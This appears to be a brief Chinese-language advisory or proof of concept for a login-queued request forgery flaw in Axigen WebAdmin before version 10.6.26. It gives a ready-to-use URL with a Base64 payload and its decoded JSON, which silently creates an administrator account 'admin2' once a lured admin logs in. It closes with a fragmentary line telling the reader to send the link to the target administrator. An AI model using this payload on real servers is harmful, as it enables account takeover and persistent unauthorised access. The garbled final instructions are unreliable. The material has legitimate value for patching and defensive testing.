Axigen WebAdmin 界面中的关键状态更改操作可通过 GET 请求 访问。虽然 _h 令牌可以防范直接的 CSRF,但应用程序会在用户认证后立即通过 _s(面包屑)参数处理排队请求。
攻击者可以构造一个 URL,在 _s 参数中包含 Base64 编码的有效载荷。如果管理员点击此链接并完成登录过程,则排队中的操作将在其上下文中自动执行。
受影响版本: < 10.6.26
更多信息请参阅 Axigen 知识库。
目标 URL:
https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19
解码后的有效载荷(_s 参数):
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}
_s 参数值,并将其传递给目标管理员。admin2 账户(或执行您自定义的其他操作)。